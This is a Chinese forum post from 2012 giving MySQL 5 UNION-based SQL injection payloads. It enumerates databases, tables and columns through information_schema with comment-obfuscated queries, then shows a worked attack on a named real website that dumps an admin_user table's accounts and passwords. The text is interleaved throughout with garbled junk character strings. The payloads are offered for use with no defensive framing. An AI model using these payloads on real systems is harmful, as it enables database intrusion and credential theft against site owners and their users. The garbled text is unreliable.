查库. Q _" j; U/ `) G
2 H/ d3 B7 f- V5 ]6 z. `% H8 Eid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*' X* e! R2 Y2 \; f7 G F! o/ C
1 S+ o! I9 N) C, y# d
查表0 |, R F) W/ B" q1 t1 L/ K1 n
3 N7 K: _8 X- K# W$ J/ l3 g3 E
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1$ X1 e0 B& {0 C5 S! y
# ~7 a0 J0 R5 y7 C6 N* E# L查段
3 z0 K1 ~! s" O3 L5 ~& O2 G7 N& V0 v. y! P- k$ u( i* L
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,18 w! }' u( Z& T. {
" M& ^8 g. U2 V( L( s& [6 |
) b5 _( U! x) ~! B$ n6 j" P, I7 tmysql5高级注入方法暴表3 ?0 N" F3 V5 Q; }/ Q3 e
% G! Z0 H ]% T' F, r4 Q" l( H+ y
例子如下:7 g3 r& [, u9 r$ q7 U, f9 X
) Z; N8 i& I ?7 \: t1.爆表
( o, y' b8 }- E8 [ rhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
5 e7 v& W$ K; o9 | e; J' u这样爆到第4个时出现了admin_user表。* l; V7 A* _# y, `
4 w$ d5 L6 C* ^: y8 m1 o2.暴字段# t* x* M! V' s) `2 |* S, Z
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*' ]/ M, Z* y" s5 S* k, p
- g% Y+ f" z, }, `- q! e. y9 o# G. _
0 l: U) g0 w, z: n- D- H' B% Z3.爆密码7 J! k1 k8 L8 k" W* I' Z# ^
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
& c0 ~/ d5 L, ~! ]0 r9 v( L- ~& C" c- O5 y2 R6 r) U
5 G. A! b |& C) B& @
|
发表于 2012-9-13 16:29:37
收藏
支持
反对